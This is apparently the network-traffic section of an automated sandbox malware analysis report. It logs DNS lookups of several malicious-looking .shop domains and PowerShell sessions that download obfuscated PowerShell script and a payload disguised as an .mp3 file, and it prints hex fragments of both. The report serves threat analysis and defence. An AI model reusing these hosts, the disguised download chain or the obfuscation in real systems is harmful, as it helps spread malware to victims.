                                                                                            Jan 15, 2025 18:25:50.425784111 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.425828934 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.425868988 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.425873041 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.425885916 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.425923109 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.425959110 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.426034927 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.426050901 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.426192999 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.426239014 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.426249981 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.430449963 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.430510044 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.430541039 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.430545092 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.430555105 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.430589914 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.473628998 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.513041973 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.513303995 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.513531923 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.609695911 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.609724045 CET44357702172.67.212.45192.168.2.6
                                                                                            Jan 15, 2025 18:25:50.609736919 CET57702443192.168.2.6172.67.212.45
                                                                                            Jan 15, 2025 18:25:50.609744072 CET44357702172.67.212.45192.168.2.6

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 15, 2025 18:25:07.398802042 CET6135253192.168.2.61.1.1.1
                                                                                            Jan 15, 2025 18:25:07.409837008 CET53613521.1.1.1192.168.2.6
                                                                                            Jan 15, 2025 18:25:19.808969021 CET53594291.1.1.1192.168.2.6
                                                                                            Jan 15, 2025 18:25:34.316669941 CET6519153192.168.2.61.1.1.1
                                                                                            Jan 15, 2025 18:25:34.327425957 CET53651911.1.1.1192.168.2.6
                                                                                            Jan 15, 2025 18:25:37.404593945 CET5527553192.168.2.61.1.1.1
                                                                                            Jan 15, 2025 18:25:37.420726061 CET53552751.1.1.1192.168.2.6
                                                                                            Jan 15, 2025 18:25:49.694442987 CET5064153192.168.2.61.1.1.1
                                                                                            Jan 15, 2025 18:25:49.705955029 CET53506411.1.1.1192.168.2.6

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Jan 15, 2025 18:25:07.398802042 CET192.168.2.61.1.1.10xd2b6Standard query (0)e1.foiloverturnarrival.shopA (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:34.316669941 CET192.168.2.61.1.1.10xa11cStandard query (0)f1.foiloverturnarrival.shopA (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.404593945 CET192.168.2.61.1.1.10xbcdfStandard query (0)idealizetreez.shopA (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:49.694442987 CET192.168.2.61.1.1.10xe219Standard query (0)klipgibob.shopA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Jan 15, 2025 18:25:07.409837008 CET1.1.1.1192.168.2.60xd2b6No error (0)e1.foiloverturnarrival.shop172.67.194.161A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:07.409837008 CET1.1.1.1192.168.2.60xd2b6No error (0)e1.foiloverturnarrival.shop104.21.44.33A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:34.327425957 CET1.1.1.1192.168.2.60xa11cNo error (0)f1.foiloverturnarrival.shop172.67.194.161A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:34.327425957 CET1.1.1.1192.168.2.60xa11cNo error (0)f1.foiloverturnarrival.shop104.21.44.33A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.64.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.32.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.48.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.80.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.112.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.16.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:37.420726061 CET1.1.1.1192.168.2.60xbcdfNo error (0)idealizetreez.shop104.21.96.1A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:49.705955029 CET1.1.1.1192.168.2.60xe219No error (0)klipgibob.shop172.67.212.45A (IP address)IN (0x0001)false
                                                                                            Jan 15, 2025 18:25:49.705955029 CET1.1.1.1192.168.2.60xe219No error (0)klipgibob.shop104.21.61.168A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • e1.foiloverturnarrival.shop
                                                                                            • f1.foiloverturnarrival.shop
                                                                                            • idealizetreez.shop
                                                                                            • klipgibob.shop

                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.649715172.67.194.1614432104C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:07 UTC90OUTGET /5c85i3vbf.vdf HTTP/1.1
                                                                                            Host: e1.foiloverturnarrival.shop
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-15 17:25:08 UTC1001INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:08 GMT
                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                            Content-Length: 3415715
                                                                                            Connection: close
                                                                                            X-Powered-By: Express
                                                                                            ETag: W/"341ea3-9m0jhLI32SDO/Va7kOyYSkcH3cY"
                                                                                            Set-Cookie: connect.sid=s%3A7cjupg5BA1wzgzMVfqNu9G36xyeqgnsy.RqpseHrsjkvR2wI6E4j7tF%2Fo8nIkhEXmrHdx8%2FP16rY; Path=/; HttpOnly
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BIqAmmVjIq1lbSyiZLz90WqHZ3W8NeUcY9utsTTd7oXVBQTJQTgjDzhM%2FVtuzIOaXOOTHhOQbKxFaQVAUuXjJGn%2FTlTJSNqe2upufOvQoyX0HoEfJFRM5TFd45fvTOoPX6rqe%2BFS%2BLZriOXm3LM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902790354fe0abee-YYZ
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=13858&min_rtt=13854&rtt_var=5204&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2863&recv_bytes=704&delivery_rate=210238&cwnd=32&unsent_bytes=0&cid=ce3b1101d76f5210&ts=477&x=0"
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 0d 0a 24 5a 54 47 61 6e 78 42 49 56 4a 20 3d 20 28 28 28 28 28 28 28 2d 33 32 20 2a 20 33 34 34 31 30 29 20 2b 20 32 38 32 30 30 29 20 2b 20 34 39 35 36 29 20 2a 20 28 28 28 28 28 2d 36 20 2d 20 24 5a 54 47 61 6e 78 42 49 56 4a 29 20 2b 20 37 38 39 38 39 29 20 2a 20 30 29 20 2b 20 24 5a 54 47 61 6e 78 42 49 56 4a 29 29 29 20 2d 20 24 5a 54 47 61 6e 78 42 49 56 4a 29 29 20 2d 20 28 28 28 24 5a 54 47 61 6e 78 42 49 56 4a 20 2d 20 32 33 33 31 32 29 20 2d 20 24 5a 54 47 61 6e 78 42 49 56 4a 29 20 2b 20 38 39 30 38 29 29 0d 0a 24 66 70 64 6b 67 57 55 54 76 20 3d 20 28 28 28 28 28 24 5a 54 47 61 6e 78 42 49 56 4a 20 2b 20 24 5a 54 47 61 6e 78 42 49 56 4a 29 20 2d 20 28 28 28 28 28 28 24 5a 54 47 61 6e 78 42 49 56 4a 20 2b 20 24 5a 54 47 61 6e 78 42 49 56 4a 29
                                                                                            Data Ascii: $ZTGanxBIVJ = (((((((-32 * 34410) + 28200) + 4956) * (((((-6 - $ZTGanxBIVJ) + 78989) * 0) + $ZTGanxBIVJ))) - $ZTGanxBIVJ)) - ((($ZTGanxBIVJ - 23312) - $ZTGanxBIVJ) + 8908))$fpdkgWUTv = ((((($ZTGanxBIVJ + $ZTGanxBIVJ) - (((((($ZTGanxBIVJ + $ZTGanxBIVJ)
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 38 34 29 20 2a 20 24 66 70 64 6b 67 57 55 54 76 29 20 2d 20 24 66 70 64 6b 67 57 55 54 76 29 20 2a 20 28 28 28 28 28 28 37 20 2b 20 37 33 30 29 20 2b 20 24 68 5a 71 4f 47 42 53 43 58 48 4a 68 75 79 29 20 2a 20 37 36 30 29 20 2b 20 2d 37 29 20 2a 20 37 35 36 32 31 29 29 29 29 20 2a 20 28 28 28 28 24 68 57 70 6f 47 6d 63 56 54 20 2a 20 35 39 29 20 2b 20 2d 38 29 20 2d 20 2d 31 31 34 38 35 30 29 20 2d 20 38 36 36 36 29 29 0d 0a 24 5a 70 68 71 57 55 58 4b 74 6b 72 4b 6d 67 20 3d 20 28 28 28 28 2d 31 37 33 36 30 37 20 2a 20 28 28 28 28 28 38 39 20 2d 20 2d 34 34 31 33 31 29 20 2b 20 24 68 63 64 5a 4a 78 6e 42 52 6c 6c 63 68 7a 63 6b 57 41 29 20 2a 20 24 67 50 61 4c 4a 74 59 64 54 66 62 7a 73 45 78 63 56 6b 41 29 20 2b 20 32 39 35 33 32 29 29 29 20 2a 20 36 31
                                                                                            Data Ascii: 84) * $fpdkgWUTv) - $fpdkgWUTv) * ((((((7 + 730) + $hZqOGBSCXHJhuy) * 760) + -7) * 75621)))) * (((($hWpoGmcVT * 59) + -8) - -114850) - 8666))$ZphqWUXKtkrKmg = ((((-173607 * (((((89 - -44131) + $hcdZJxnBRllchzckWA) * $gPaLJtYdTfbzsExcVkA) + 29532))) * 61
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 75 79 29 20 2d 20 2d 31 29 29 29 29 20 2a 20 28 28 28 2d 35 39 38 32 20 2d 20 24 53 61 6b 4f 54 4c 77 79 45 75 6b 69 54 77 47 71 49 59 78 66 29 20 2a 20 2d 36 39 29 20 2d 20 2d 38 31 30 36 29 29 0d 0a 24 68 41 51 6f 70 54 62 61 56 78 47 75 51 72 69 6f 52 49 20 3d 20 28 28 28 28 24 66 70 64 6b 67 57 55 54 76 20 2b 20 28 28 28 28 28 28 33 34 20 2a 20 24 78 71 73 53 58 59 76 4a 67 6b 6f 6f 70 74 42 50 61 4f 62 59 29 20 2d 20 36 38 29 20 2d 20 2d 38 29 20 2d 20 2d 38 29 20 2d 20 24 53 61 6b 4f 54 4c 77 79 45 75 6b 69 54 77 47 71 49 59 78 66 29 29 29 20 2d 20 28 28 28 28 34 20 2b 20 24 68 41 51 6f 70 54 62 61 56 78 47 75 51 72 69 6f 52 49 29 20 2a 20 2d 38 29 20 2a 20 36 35 33 29 29 29 20 2d 20 24 78 71 73 53 58 59 76 4a 67 6b 6f 6f 70 74 42 50 61 4f 62 59 29
                                                                                            Data Ascii: uy) - -1)))) * (((-5982 - $SakOTLwyEukiTwGqIYxf) * -69) - -8106))$hAQopTbaVxGuQrioRI = (((($fpdkgWUTv + ((((((34 * $xqsSXYvJgkooptBPaObY) - 68) - -8) - -8) - $SakOTLwyEukiTwGqIYxf))) - ((((4 + $hAQopTbaVxGuQrioRI) * -8) * 653))) - $xqsSXYvJgkooptBPaObY)
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 20 7d 0d 0a 20 20 20 20 24 7a 70 67 70 6f 54 45 55 63 50 57 4d 2d 2d 0d 0a 7d 0d 0a 24 41 4d 44 4a 67 57 63 42 78 43 69 45 61 4c 44 61 6e 55 77 6d 48 20 3d 20 28 28 28 28 28 28 24 46 43 65 78 48 5a 46 66 75 20 2b 20 28 28 28 34 20 2b 20 28 28 28 28 28 24 69 65 4b 5a 6f 70 41 70 77 52 44 46 53 70 69 20 2d 20 2d 35 35 38 31 29 20 2a 20 28 28 28 28 28 37 36 39 30 20 2d 20 24 41 4d 44 4a 67 57 63 42 78 43 69 45 61 4c 44 61 6e 55 77 6d 48 29 20 2a 20 24 41 4d 44 4a 67 57 63 42 78 43 69 45 61 4c 44 61 6e 55 77 6d 48 29 20 2a 20 24 59 45 4a 4c 77 48 70 44 70 41 4a 6f 55 4b 6a 69 62 50 4b 5a 43 29 20 2a 20 2d 37 32 36 35 37 30 29 29 29 20 2a 20 34 36 36 35 30 29 20 2d 20 38 30 29 29 29 20 2b 20 28 28 28 28 28 28 28 2d 31 20 2a 20 36 31 29 20 2b 20 28 28 28 28 28
                                                                                            Data Ascii: } $zpgpoTEUcPWM--}$AMDJgWcBxCiEaLDanUwmH = (((((($FCexHZFfu + (((4 + ((((($ieKZopApwRDFSpi - -5581) * (((((7690 - $AMDJgWcBxCiEaLDanUwmH) * $AMDJgWcBxCiEaLDanUwmH) * $YEJLwHpDpAJoUKjibPKZC) * -726570))) * 46650) - 80))) + (((((((-1 * 61) + (((((
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 6f 72 20 28 24 67 50 61 4c 4a 74 59 64 54 66 62 7a 73 45 78 63 56 6b 41 20 2d 6e 65 20 24 59 4d 58 4e 50 45 6f 56 63 54 79 66 76 42 57 70 4c 59 58 29 29 20 7b 0d 0a 20 20 20 20 24 68 57 70 6f 47 6d 63 56 54 20 3d 20 28 28 28 2d 36 34 20 2b 20 24 41 4d 44 4a 67 57 63 42 78 43 69 45 61 4c 44 61 6e 55 77 6d 48 29 20 2b 20 33 39 30 38 29 20 2b 20 24 46 43 65 78 48 5a 46 66 75 29 0d 0a 7d 0d 0a 69 66 20 28 28 35 31 20 2d 6c 74 20 2d 34 36 34 39 37 29 20 2d 61 6e 64 20 28 24 76 50 65 68 54 48 69 7a 75 72 63 62 57 43 76 4d 6e 77 74 48 20 2d 6e 65 20 2d 36 29 20 2d 61 6e 64 20 28 2d 35 33 32 33 20 2d 67 74 20 24 5a 70 68 71 57 55 58 4b 74 6b 72 4b 6d 67 29 20 2d 61 6e 64 20 28 2d 31 32 30 35 20 2d 6c 74 20 24 5a 70 68 71 57 55 58 4b 74 6b 72 4b 6d 67 29 29 20 7b
                                                                                            Data Ascii: or ($gPaLJtYdTfbzsExcVkA -ne $YMXNPEoVcTyfvBWpLYX)) { $hWpoGmcVT = (((-64 + $AMDJgWcBxCiEaLDanUwmH) + 3908) + $FCexHZFfu)}if ((51 -lt -46497) -and ($vPehTHizurcbWCvMnwtH -ne -6) -and (-5323 -gt $ZphqWUXKtkrKmg) -and (-1205 -lt $ZphqWUXKtkrKmg)) {
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 24 46 43 65 78 48 5a 46 66 75 20 2d 6c 65 20 24 66 70 64 6b 67 57 55 54 76 29 29 20 7b 0d 0a 20 20 20 20 24 46 43 65 78 48 5a 46 66 75 20 3d 20 28 28 28 28 24 76 50 65 68 54 48 69 7a 75 72 63 62 57 43 76 4d 6e 77 74 48 20 2a 20 24 68 57 70 6f 47 6d 63 56 54 29 20 2d 20 34 39 39 37 29 29 20 2b 20 28 28 28 2d 39 33 39 20 2d 20 28 28 28 28 24 68 63 64 5a 4a 78 6e 42 52 6c 6c 63 68 7a 63 6b 57 41 20 2d 20 37 31 36 30 38 29 20 2a 20 24 6c 70 6a 73 75 44 5a 44 4e 6b 66 61 52 74 54 49 6a 55 52 29 20 2b 20 24 46 43 65 78 48 5a 46 66 75 29 29 29 20 2d 20 24 69 65 4b 5a 6f 70 41 70 77 52 44 46 53 70 69 29 20 2a 20 28 28 28 28 28 28 2d 31 33 36 20 2b 20 24 68 41 51 6f 70 54 62 61 56 78 47 75 51 72 69 6f 52 49 29 20 2b 20 2d 37 35 37 30 36 38 29 20 2b 20 24 67 50 61
                                                                                            Data Ascii: $FCexHZFfu -le $fpdkgWUTv)) { $FCexHZFfu = (((($vPehTHizurcbWCvMnwtH * $hWpoGmcVT) - 4997)) + (((-939 - (((($hcdZJxnBRllchzckWA - 71608) * $lpjsuDZDNkfaRtTIjUR) + $FCexHZFfu))) - $ieKZopApwRDFSpi) * ((((((-136 + $hAQopTbaVxGuQrioRI) + -757068) + $gPa
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 57 55 58 4b 74 6b 72 4b 6d 67 29 20 2d 20 33 29 20 2d 20 24 76 50 65 68 54 48 69 7a 75 72 63 62 57 43 76 4d 6e 77 74 48 29 20 2a 20 39 31 29 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 28 2d 38 20 2d 65 71 20 34 32 33 34 38 36 29 20 2d 61 6e 64 20 28 2d 38 35 37 38 20 2d 6c 74 20 24 46 43 65 78 48 5a 46 66 75 29 20 2d 61 6e 64 20 28 2d 34 39 35 30 39 20 2d 6e 65 20 24 68 63 64 5a 4a 78 6e 42 52 6c 6c 63 68 7a 63 6b 57 41 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 78 71 73 53 58 59 76 4a 67 6b 6f 6f 70 74 42 50 61 4f 62 59 20 3d 20 28 28 28 2d 39 37 20 2b 20 24 75 57 7a 78 5a 52 67 65 70 52 57 58 48 63 47 6e 61 56 4e 29 20 2d 20 34 30 30 38 36 34 29 20 2a 20 2d 34 35 39 37 34 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 69 66 20 28 28 24 75 57
                                                                                            Data Ascii: WUXKtkrKmg) - 3) - $vPehTHizurcbWCvMnwtH) * 91))) } if ((-8 -eq 423486) -and (-8578 -lt $FCexHZFfu) -and (-49509 -ne $hcdZJxnBRllchzckWA)) { $xqsSXYvJgkooptBPaObY = (((-97 + $uWzxZRgepRWXHcGnaVN) - 400864) * -45974) } if (($uW
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 34 29 20 2d 20 35 29 29 29 20 2d 20 28 28 28 24 42 45 62 55 53 59 6f 44 6a 79 20 2b 20 32 30 37 29 20 2d 20 24 67 50 61 4c 4a 74 59 64 54 66 62 7a 73 45 78 63 56 6b 41 29 29 29 20 2b 20 31 29 20 2a 20 24 68 57 70 6f 47 6d 63 56 54 29 20 2b 20 31 36 36 38 36 30 29 29 29 29 20 2b 20 28 28 28 28 24 76 50 65 68 54 48 69 7a 75 72 63 62 57 43 76 4d 6e 77 74 48 20 2b 20 2d 33 39 30 39 35 29 20 2b 20 30 29 20 2a 20 28 28 28 28 28 2d 39 31 33 20 2d 20 24 66 70 64 6b 67 57 55 54 76 29 20 2b 20 24 68 41 51 6f 70 54 62 61 56 78 47 75 51 72 69 6f 52 49 29 20 2d 20 37 36 37 29 20 2b 20 2d 33 33 33 34 32 29 29 29 20 2d 20 24 41 4d 44 4a 67 57 63 42 78 43 69 45 61 4c 44 61 6e 55 77 6d 48 29 29 29 29 0d 0a 69 66 20 28 28 32 20 2d 6e 65 20 24 5a 54 47 61 6e 78 42 49 56 4a
                                                                                            Data Ascii: 4) - 5))) - ((($BEbUSYoDjy + 207) - $gPaLJtYdTfbzsExcVkA))) + 1) * $hWpoGmcVT) + 166860)))) + (((($vPehTHizurcbWCvMnwtH + -39095) + 0) * (((((-913 - $fpdkgWUTv) + $hAQopTbaVxGuQrioRI) - 767) + -33342))) - $AMDJgWcBxCiEaLDanUwmH))))if ((2 -ne $ZTGanxBIVJ
                                                                                            2025-01-15 17:25:08 UTC562INData Raw: 20 2d 20 32 35 30 34 30 30 29 20 2d 20 24 6c 66 6d 67 43 7a 7a 77 72 78 50 4b 4c 62 6b 65 51 4c 29 20 2d 20 24 76 50 65 68 54 48 69 7a 75 72 63 62 57 43 76 4d 6e 77 74 48 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 46 43 65 78 48 5a 46 66 75 20 3d 20 28 28 28 28 28 28 38 20 2b 20 24 78 71 73 53 58 59 76 4a 67 6b 6f 6f 70 74 42 50 61 4f 62 59 29 20 2a 20 24 75 57 7a 78 5a 52 67 65 70 52 57 58 48 63 47 6e 61 56 4e 29 20 2d 20 28 28 28 28 32 36 34 34 30 20 2d 20 2d 31 29 20 2d 20 2d 35 37 29 20 2b 20 24 64 44 6f 62 73 41 4a 51 44 65 79 50 6f 76 29 29 29 20 2a 20 24 42 45 62 55 53 59 6f 44 6a 79 29 29 20 2d 20 28 28 28 28 38 34 33 30 34 20 2a 20 24 45 46 45 62 6f 55 6c 48 42 71 76 77 52 4a 57 29 20 2a 20 24 67 50 61 4c 4a 74 59 64 54 66 62 7a 73 45 78 63
                                                                                            Data Ascii: - 250400) - $lfmgCzzwrxPKLbkeQL) - $vPehTHizurcbWCvMnwtH)) } $FCexHZFfu = ((((((8 + $xqsSXYvJgkooptBPaObY) * $uWzxZRgepRWXHcGnaVN) - ((((26440 - -1) - -57) + $dDobsAJQDeyPov))) * $BEbUSYoDjy)) - ((((84304 * $EFEboUlHBqvwRJW) * $gPaLJtYdTfbzsExc
                                                                                            2025-01-15 17:25:08 UTC1369INData Raw: 5a 44 4e 6b 66 61 52 74 54 49 6a 55 52 20 2a 20 2d 32 29 20 2a 20 2d 32 32 38 29 20 2b 20 24 68 57 70 6f 47 6d 63 56 54 29 20 2d 20 24 46 43 65 78 48 5a 46 66 75 29 29 20 2d 20 28 28 28 37 20 2b 20 2d 38 36 32 36 29 20 2b 20 2d 33 30 33 30 35 29 20 2b 20 37 34 33 36 34 38 29 29 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 24 64 44 6f 62 73 41 4a 51 44 65 79 50 6f 76 20 3d 20 28 28 28 24 68 57 70 6f 47 6d 63 56 54 20 2a 20 37 29 20 2b 20 24 64 44 6f 62 73 41 4a 51 44 65 79 50 6f 76 29 20 2b 20 28 28 28 28 36 20 2d 20 2d 33 37 31 29 20 2d 20 24 75 57 7a 78 5a 52 67 65 70 52 57 58 48 63 47 6e 61 56 4e 29 20 2b 20 36 37 35 39 31 36 29 29 29 0d 0a 20 20 20 20 24 64 44 6f 62 73 41 4a 51 44 65 79 50 6f 76 20 3d 20 28 28 28 28 24 59 45 4a 4c 77 48 70 44 70 41 4a 6f 55
                                                                                            Data Ascii: ZDNkfaRtTIjUR * -2) * -228) + $hWpoGmcVT) - $FCexHZFfu)) - (((7 + -8626) + -30305) + 743648)) } $dDobsAJQDeyPov = ((($hWpoGmcVT * 7) + $dDobsAJQDeyPov) + ((((6 - -371) - $uWzxZRgepRWXHcGnaVN) + 675916))) $dDobsAJQDeyPov = (((($YEJLwHpDpAJoU


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.657600172.67.194.1614432104C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:34 UTC211OUTGET /riiw1.mp3 HTTP/1.1
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                            Host: f1.foiloverturnarrival.shop
                                                                                            Connection: Keep-Alive
                                                                                            2025-01-15 17:25:35 UTC920INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:35 GMT
                                                                                            Content-Type: audio/mpeg
                                                                                            Content-Length: 1182728
                                                                                            Connection: close
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "338cff038bf230511fc3c5dccc27bdf3"
                                                                                            Last-Modified: Tue, 14 Jan 2025 12:01:46 GMT
                                                                                            Vary: Accept-Encoding
                                                                                            cf-cache-status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2FXrAwVlK%2FFB8dFlcC03ubG65kktpWBKZHrhZdevdRvswD6%2FJSQ9j4m63gZC8J9hvQdDI1TzRkhiWr8gwkLWLRk5sJNEFLnOJ2ZG15wiPujfASBMP8o8MhWWB9Nb5i39TsHalikhlH8uBClOkc4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902790dd5978a2ae-YUL
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17965&min_rtt=17845&rtt_var=6778&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2878&recv_bytes=825&delivery_rate=163631&cwnd=32&unsent_bytes=0&cid=5513570b6ea4ae2a&ts=393&x=0"
                                                                                            2025-01-15 17:25:35 UTC449INData Raw: ef e2 0b 67 70 2c 2b 3f 0e e6 c9 db 18 f2 94 87 4c 04 bf bc c4 e6 41 3a 9d 8d f2 97 a3 36 2c cd 7d 61 2b eb 96 20 b4 4a ab 15 ea 0d 4a e9 c8 69 e1 86 bf f9 2a 7d 65 c7 87 2f a8 78 e6 4e 1b a3 44 20 1a 85 bd 3d d5 71 18 8d b2 85 e9 32 1c 7c b6 a6 65 76 c8 d4 8b 22 fd db 78 c9 67 5c b1 94 cd 80 60 93 22 fb 0d 3a 0f 86 a9 0a ee 0b 74 e5 d8 cd 2e ba f9 ec c6 f1 04 57 e7 b7 f0 08 16 53 30 64 f1 7d 63 92 b3 4c c8 35 48 2f 67 20 9e 6c cb 27 74 98 73 3c 83 37 0d 59 38 10 7e db 43 ce f8 68 df da 22 3e 91 1a b6 d0 26 9e 1b 9e dc 9d f0 f7 d0 14 1b 0f c2 0d 2d 39 9f ba 51 c3 fd da 77 21 69 ac 3c 6e 85 a2 a1 c3 73 b9 e7 c2 46 09 6a 00 7a 75 98 0b ac 3a 6c 3a d6 9e 73 cf 53 bb fe 0d a8 6d 5b bb 15 bd 88 28 52 da 8f d4 e4 7d f6 a3 32 03 51 a7 9f f9 10 e5 ba 2d 75 8e d8
                                                                                            Data Ascii: gp,+?LA:6,}a+ JJi*}e/xND =q2|ev"xg\`":t.WS0d}cL5H/g l'ts<7Y8~Ch">&-9Qw!i<nsFjzu:l:sSm[(R}2Q-u
                                                                                            2025-01-15 17:25:35 UTC1369INData Raw: 27 d5 78 0a ac e6 83 65 be 88 79 70 42 a0 12 58 b5 1b 6c 83 1c ec c7 b5 0e 84 1c 32 7f 11 4c 98 3d 99 87 a2 41 45 da 4b 71 65 da 2f a2 d9 3d 89 e3 d0 48 c0 4a 01 c6 63 e7 24 ee 78 c2 9d ad 34 3c fe 4c 7b 60 38 8b ac f5 55 24 35 c9 29 4f 79 1b 6a eb 97 25 fa 18 62 e1 ad 71 87 65 dd 41 4a 80 54 75 cb 53 dc d7 cb 14 3a f1 8f bb f2 ad 21 0a ef 5b 96 23 4b 82 a7 94 7c d2 f6 d7 87 fc 67 4f 28 44 97 4e 96 de 98 e2 b8 11 64 43 31 4e fa 03 01 d2 0b 34 f6 4b 23 64 57 ff bb 72 5e c4 1a 83 48 bb b6 1d 61 86 33 c7 16 5a bf d8 56 b3 1e 5b 05 57 9e 11 f1 ff 0e e7 c5 28 0e 97 ae d8 37 a6 21 80 66 5e b5 fe ad 93 3e 04 85 6e dd 49 17 8d 9a 45 15 be 4f b6 2a 14 c3 10 88 6b b9 61 8c 1b 11 94 a1 73 86 23 1d b2 28 46 23 6d c7 f9 c1 9a 81 c1 61 27 53 6c c5 fe 1e cf f3 62 82 a2
                                                                                            Data Ascii: 'xeypBXl2L=AEKqe/=HJc$x4<L{`8U$5)Oyj%bqeAJTuS:![#K|gO(DNdC1N4K#dWr^Ha3ZV[W(7!f^>nIEO*kas#(F#ma'Slb
